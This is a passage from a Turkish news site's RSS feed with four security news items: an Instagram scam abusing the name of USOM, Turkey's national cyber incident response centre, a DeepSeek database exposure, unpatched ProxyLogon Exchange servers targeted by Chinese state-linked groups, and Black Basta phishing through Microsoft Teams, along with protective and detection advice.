<guid>https://www.ajansexpres.com.tr/instagram-reklamlari-uzerinden-yeni-dolandiricilik-yoentemi-kullanici-bilgileri-hedefte</guid>
<description><![CDATA[ Ebubekir Bastama&#039;nın paylaştığı videoya göre, dolandırıcılar Instagram reklamlarını kullanarak USOM adıyla güven kazanıp, mağdurların kişisel ve finansal bilgilerini ele geçiriyor. Sahte &#039;siber saldırı mağdurlarına yardım&#039; iddiasıyla yayılan bu yöntem büyük risk taşıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202502/image_870x580_67a2db9a18db7.webp" length="28600" type="image/jpeg"/>
<pubDate>Wed, 05 Feb 2025 06:32:46 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>Instagram&#039;da yeni dolandırıcılık yöntemi nedir, USOM adı dolandırıcılıkta nasıl kullanılıyor, Instagram sahte formlarla nasıl veri topluyor, sosyal medya dolandırıcılığı nasıl önlenir</media:keywords>
<content:encoded><![CDATA[<section>
<h2>Dolandırıcılık Yöntemi Nasıl İşliyor?</h2>
<p>Sosyal medya platformları üzerinden yayılan dolandırıcılık yöntemlerine bir yenisi eklendi. <strong>Ebubekir Bastama</strong>, YouTube kanalında yayınladığı <a href="https://www.youtube.com/watch?v=cTWZQ6YatjY" target="_blank" rel="noopener">videoda</a>, Instagram’da sahte videolu reklamlarla kullanıcıları kandıran yeni bir dolandırıcılık tekniğini detaylandırdı.</p>
</section>
<section>
<h2>Dolandırıcılar Hangi Yöntemleri Kullanıyor?</h2>
<h3>USOM Adı Kullanılarak Güven Kazanılıyor</h3>
<p>Dolandırıcılar, Türkiye’de siber güvenliği izleyen <strong>Ulusal Siber Olaylara Müdahale Merkezi’nin (USOM)</strong> adını kullanarak, siber saldırıya uğrayan kişilere yardım edeceklerini iddia ediyor. Ancak amaç, mağdurların <strong>kişisel ve finansal bilgilerini ele geçirmek</strong>.</p>
<h3>Instagram Üzerinden Bilgi Toplama Tuzağı</h3>
<p>Dolandırıcılar, Instagram’da sahte bir <strong>"Instagram İletişim Formu"</strong> üzerinden şu bilgileri talep ediyor:</p>
<ul>
<li><strong>Ne kadar para kaybettiniz?</strong> (Yaklaşık bir miktar belirtilmesi isteniyor.)</li>
<li><strong>Bu kayıp ne zaman gerçekleşti?</strong> (Ay ve yıl bilgisi talep ediliyor.)</li>
<li><strong>Olayın detaylarını paylaşın.</strong> (Dolandırıcılık yöntemi, işlem detayları ve şirket adı gibi bilgiler isteniyor.)</li>
<li><strong>İletişim bilgileri:</strong> Ad, soyad, e-posta ve telefon numarası talep ediliyor.</li>
</ul>
</section>
<section>
<h2>Dolandırıcılar Nasıl Filtreleri Aşıyor?</h2>
<h3>Sosyal Medyada Güvenilir Görünme Çabası</h3>
<p>Sahtekarlar, Instagram’ın dolandırıcılıkla ilgili filtrelerini atlatmak için çeşitli teknikler kullanıyor. <strong>Standart dolandırıcılık yöntemlerinden farklı olarak, resmi görünümlü bir form ile veri topluyorlar</strong> ve mağdurlara güven vermek amacıyla <strong>videolu reklamlar</strong> kullanıyorlar.</p>
<h3><a href="http://ebubekirbastama.com/" target="_blank" rel="noopener">Ebubekir Bastama</a>’dan Uyarı</h3>
<p><a href="https://ebubekirbastama.com.tr/" target="_blank" rel="noopener"><strong>Ebubekir Bastama</strong></a>, bu tür sahte reklamlara ve formlara <strong>kesinlikle bilgi girilmemesi</strong> gerektiğini vurguluyor. Ayrıca, sosyal medya platformlarında karşılaşılan benzer şüpheli içeriklerin <strong>ilgili platform yetkililerine bildirilmesi gerektiğini</strong> belirtiyor.</p>
</section>
<section>
<h2>Dolandırıcılıktan Korunmak İçin Ne Yapılmalı?</h2>
<h3>Alınması Gereken Önlemler</h3>
<ul>
<li><strong>Resmi kurumlardan geldiği iddia edilen duyuruların doğruluğu kontrol edilmeli.</strong></li>
<li><strong>Bilinmeyen bağlantılar ve formlar doldurulmamalı.</strong></li>
<li><strong>Instagram ve diğer sosyal medya platformlarının resmi destek kanalları kullanılmalı.</strong></li>
<li><strong>Şüpheli reklamlar ilgili platformlara bildirilerek yayılması engellenmeli.</strong></li>
<li><strong>Kesinlikle sosyal medya reklamlarına kişisel veya finansal bilgiler verilmemeli.</strong></li>
<li><strong>Bilinçli olalım, sosyal medyada paylaşılan her bilgiye güvenmeden önce araştırma yapalım.</strong></li>
</ul>
</section>
<p></p>]]> </content:encoded>
</item>

<item>
<title>DeepSeek AI Veri Sızıntısı: 1 Milyondan Fazla Günlük ve Gizli Anahtar Ele Geçirildi</title>
<link>https://www.ajansexpres.com.tr/deepseek-ai-veri-sizintisi-1-milyondan-fazla-gunluk-ve-gizli-anahtar-ele-gecirildi</link>
<guid>https://www.ajansexpres.com.tr/deepseek-ai-veri-sizintisi-1-milyondan-fazla-gunluk-ve-gizli-anahtar-ele-gecirildi</guid>
<description><![CDATA[ Yapay zeka girişimi DeepSeek&#039;in kritik bir veritabanı açığı nedeniyle 1 milyondan fazla günlük kaydı, sohbet geçmişi, gizli anahtarlar ve operasyonel metaveriler internete sızdı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202502/image_870x580_679e728750206.webp" length="18788" type="image/jpeg"/>
<pubDate>Sat, 01 Feb 2025 22:15:43 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>DeepSeek veritabanı sızıntısında hangi bilgiler açığa çıktı, DeepSeek güvenlik açığı nasıl ortaya çıktı, ClickHouse veritabanı açığı nasıl kullanıldı, AI şirketleri veri güvenliği için ne yapmalı</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik firması Wiz tarafından tespit edilen güvenlik açığı, DeepSeek'in <strong>oauth2callback.deepseek[.]com:9000</strong> ve <strong>dev.deepseek[.]com:9000</strong> adreslerinde barındırılan veritabanlarının <strong>kimlik doğrulama olmadan erişilebilir</strong> olduğunu ortaya koydu. Uzmanlara göre, saldırganlar bu açık üzerinden <strong>veritabanı üzerinde tam kontrol</strong> sağlayabilir ve sistem ayrıcalıklarını yükseltebilir.</p>
<h3><strong>Açık Nasıl Kullanıldı?</strong></h3>
<p>Güvenlik araştırmacıları, sızdırılan verilerin <strong>ClickHouse’un HTTP arayüzündeki bir güvenlik açığı</strong> kullanılarak erişildiğini belirtti. Bu açıklıktan yararlanan saldırganlar, yalnızca bir web tarayıcısı üzerinden <strong>rastgele SQL sorguları çalıştırabilir</strong> hale geldi.</p>
<p>DeepSeek, güvenlik açığını doğruladı ve gerekli yamaların uygulandığını açıkladı. Ancak olay, yapay zeka girişimleri için veri güvenliği konusundaki riskleri bir kez daha gündeme getirdi.</p>
<p><img src="https://cumha.com.tr/uploads/images/202502/image_870x_679e6fdfa5eef.webp" alt=""></p>
<h3><strong>Sızdırılan Veriler Neler?</strong></h3>
<ul>
<li><strong>1 milyondan fazla günlük kaydı</strong></li>
<li><strong>Kullanıcı sohbet geçmişleri</strong></li>
<li><strong>Gizli API anahtarları ve erişim kimlik bilgileri</strong></li>
<li><strong>Arka uç sistem detayları ve operasyonel metaveriler</strong></li>
</ul>
<p>Bu olay, şirketlerin veri güvenliği önlemlerini artırması gerektiğini gösteriyor. Uzmanlar, özellikle yapay zeka alanında faaliyet gösteren firmaların, veritabanı erişimlerini sıkı şekilde denetlemeleri gerektiği konusunda uyarıda bulunuyor.</p>
<p></p>
<p><b>CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>4 Yıldır Kapatılmayan ProxyLogon Açığı, Çin Destekli Saldırıların Hedefinde</title>
<link>https://www.ajansexpres.com.tr/4-yildir-kapatilmayan-proxylogon-acigi-cin-destekli-saldirilarin-hedefinde</link>
<guid>https://www.ajansexpres.com.tr/4-yildir-kapatilmayan-proxylogon-acigi-cin-destekli-saldirilarin-hedefinde</guid>
<description><![CDATA[ Microsoft’un 2021’de yamaladığı ProxyLogon güvenlik açığı, dünya genelinde Exchange Server sistemlerinin %91’inde hala açık durumda. Çin hükümeti bağlantılı Salt Typhoon gibi siber casusluk grupları, bu zafiyetten yararlanarak telekomünikasyon ve devlet ağlarına saldırı düzenlemeye devam ediyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202501/image_870x580_6793cfad313e2.webp" length="38450" type="image/jpeg"/>
<pubDate>Fri, 24 Jan 2025 20:37:02 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>ProxyLogon güvenlik açığı nedir, Microsoft Exchange Server neden risk altında, Salt Typhoon kimdir, GhostSpider nasıl bir yazılımdır, ABD Kongresi&#039;nde hangi güvenlik konuları tartışıldı, Volt Typhoon’un hedefleri nelerdir, Flax Typhoon’un faaliyetleri nelerdir, Çin destekli siber saldırılar nasıl önlenebilir, IoT cihazları neden saldırılara açık, kritik altyapılar nasıl korunabilir</media:keywords>
<content:encoded><![CDATA[<p>Çin hükümetiyle bağlantılı siber casusluk grubu Salt Typhoon tarafından ABD'nin telekomünikasyon ve devlet ağlarına yönelik saldırılarda kullanılan ProxyLogon adlı kritik güvenlik açığı, ilk olarak Mart 2021'de Microsoft tarafından kamuoyuna duyurulmuştu. Ancak, aradan geçen dört yıla rağmen bu açığa sahip Exchange Server sistemlerinin %91'i hala yamalanmamış durumda.</p>
<p>Tenable adlı siber risk yönetim şirketinin raporuna göre, dünya genelinde yaklaşık 30 bin halka açık Microsoft Exchange Server cihazı, CVE-2021-26855 (ProxyLogon) güvenlik zafiyeti nedeniyle saldırılara açık halde bulunuyor. Bu açık, Salt Typhoon ve diğer Çin hükümeti destekli grupların hedef sistemlerde uzaktan kod yürütmesine olanak tanıyor.</p>
<p><strong>Salt Typhoon'un Taktikleri</strong><br>Tenable araştırma mühendisi Scott Caveza, Salt Typhoon'un "kurban ağlarında tespit edilmeden uzun süre kalabilmek için özel kötü amaçlı yazılımlar kullandığını" belirtti. Grup tarafından kullanılan GhostSpider, SnappyBee ve Masol gibi kötü amaçlı yazılımlar, siber casusluğun temel araçları arasında yer alıyor.</p>
<p>Salt Typhoon'un yanı sıra Volt Typhoon ve Flax Typhoon gibi diğer Çin destekli gruplar da farklı alanlarda benzer stratejiler uyguluyor. Volt Typhoon'un ABD'nin kritik altyapısını hedef aldığı ve olası bir savaşta bu altyapıyı devre dışı bırakmayı amaçladığı ifade ediliyor. Flax Typhoon ise IoT cihazlarını hedef alarak gelecekte kullanılabilecek botnet ağları oluşturuyor.</p>
<p><strong>Kongre'deki Gündem: Çin'in Siber Saldırıları</strong><br>Dün ABD Temsilciler Meclisi İç Güvenlik Komitesi'nde gerçekleştirilen oturumda, Çin'in siber saldırıları ana gündem maddelerinden biri oldu. Uzmanlar, Çin’in ABD için en "yetenekli ve fırsatçı" siber tehdit unsuru olduğunu vurguladı.</p>
<p>Eski ABD Donanması Tuğamiral Mark Montgomery, Volt Typhoon'un ABD’nin lojistik ağlarını hedef alarak askeri harekatların hızını ve etkinliğini bozmayı amaçladığını belirtti. Montgomery, "Bu operasyonları savaş alanının hazırlanması olarak nitelendiriyorum" dedi.</p>
<p><strong>Önlemler Alınmalı</strong><br>Caveza, "Bu tehdit gruplarının ısrarcı saldırılarına rağmen, kuruluşların kamuya açık cihazlarını düzenli olarak yamalaması ve bilinen güvenlik açıklarını hızla kapatması hayati önem taşımaktadır" ifadelerini kullandı.</p>]]> </content:encoded>
</item>

<item>
<title>Black Basta&amp;apos;nın Microsoft Teams&amp;apos;i Kullanarak Düzenlediği Karmaşık Phishing Saldırıları</title>
<link>https://www.ajansexpres.com.tr/black-bastanin-microsoft-teamsi-phishing-saldirisi</link>
<guid>https://www.ajansexpres.com.tr/black-bastanin-microsoft-teamsi-phishing-saldirisi</guid>
<description><![CDATA[ NVISO Labs, Black Basta adlı fidye yazılımı grubunun, Microsoft Teams&#039;i kullanarak gerçekleştirdiği gelişmiş bir phishing kampanyasını ortaya çıkardı. Grup, e-posta ve iş birliği araçlarını kullanarak hedef organizasyonlara sızmayı başarıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202501/image_870x580_67921fc6f201b.webp" length="13616" type="image/jpeg"/>
<pubDate>Thu, 23 Jan 2025 13:55:34 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>Microsoft Teams üzerinden düzenlenen sosyal mühendislik saldırıları nasıl tespit edilir, Black Basta grubu Microsoft Teams&#039;i nasıl kullanıyor, Black Basta&#039;nın e-posta bombardımanının amacı nedir, Uzak yönetim araçları saldırılarda nasıl kullanılıyor</media:keywords>
<content:encoded><![CDATA[<p>NVISO Labs tarafından ortaya çıkarılan kampanya, e-posta bombardımanıyla başlıyor. Kurbanların gelen kutuları, haber bültenleri gibi zararsız görünen spam e-postalarla dolduruluyor. Bu yöntem, kullanıcıları oyalayıp asıl tehditi gizlemek için kullanılıyor. Daha sonra saldırganlar, Microsoft Teams üzerinden "Yardım Masası" ya da "BT Destek" gibi kimliklerle hedef kişilere ulaşıyor. Rapora göre saldırganlar, kurbanları Quick Assist ya da AnyConnect gibi uzak erişim araçlarıyla erişim izni vermeye ikna ediyor.</p>
<p><img src="https://www.ajansexpres.com.tr/uploads/images/202501/image_870x_67922467d6c79.webp" alt=""></p>
<h4><strong>Saldırı Süreci</strong></h4>
<p>Microsoft Teams’te başlatılan bu sosyal mühendislik saldırıları, saldırganların güvenlik kontrollerini devre dışı bırakması, hassas verileri dışa aktarması ve zararlı yazılımlar dağıtmasıyla sonuçlanıyor.</p>
<p>NVISO Labs, bu tür saldırıların tespit edilmesine yardımcı olabilecek birkaç önemli ipucu paylaştı:</p>
<ul>
<li><strong>E-posta Trafiğinde Ani Artışlar:</strong> Spam veya phishing olarak sınıflandırılan gelen e-postalarda ani artışlar gözlemlenebilir.</li>
<li><strong>Şüpheli Görünen Kullanıcı Adları:</strong> Microsoft Teams içinde “Help Desk” veya “Support” gibi anahtar kelimeler içeren kullanıcı adlarına dikkat edilmelidir.</li>
<li><strong>Uzak Yönetim Araçlarının Kullanımı:</strong> Quick Assist veya AnyConnect gibi araçların kullanımı, şüpheli aktiviteleri işaret edebilir.</li>
<li><strong>E-posta Bombardımanı ve Sohbet Zamanlaması:</strong> E-posta bombardımanı başlatıldıktan sonraki üç saat içinde Microsoft Teams sohbetlerinin başlatıldığı durumlar araştırılmalıdır.</li>
</ul>]]> </content:encoded>
</item>

</channel>
</rss>